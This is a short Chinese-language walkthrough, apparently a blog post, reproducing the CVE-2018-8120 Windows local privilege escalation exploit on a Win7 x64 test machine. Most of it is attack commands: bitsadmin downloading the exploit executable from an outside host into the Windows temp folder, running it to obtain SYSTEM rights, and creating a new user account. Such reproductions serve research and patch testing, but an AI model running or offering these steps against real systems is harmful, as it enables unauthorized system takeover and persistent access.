windows本地提权,可将普通用户提升到系统权限。复现用的exp支持:Win7 x32、Win7 x64、Win2008 x32、Win2008 R2 x32、Win2008 R2 Datacenter x64、Win2008 Enterprise x64 WinXP x32、Win2003 x32、Win2003 x64。
复现过程
环境:win7 x64
普通用户权限,系统信息如下:
远程下载exp
1 | $ bitsadmin /rawreturn /transfer getfile http://192.168.30.149/CVE-2018-8120.exe C:\windows\temp\CVE-2018-8120.exe |
本地看一下,下载成功:(temp目录可以下载,其他目录可能提示没有访问权限)
执行exp,查看权限
1 | $ cve-2018-8120.exe whoami |
添加管理员账户test:
1 | $ net user test test /add |
添加成功。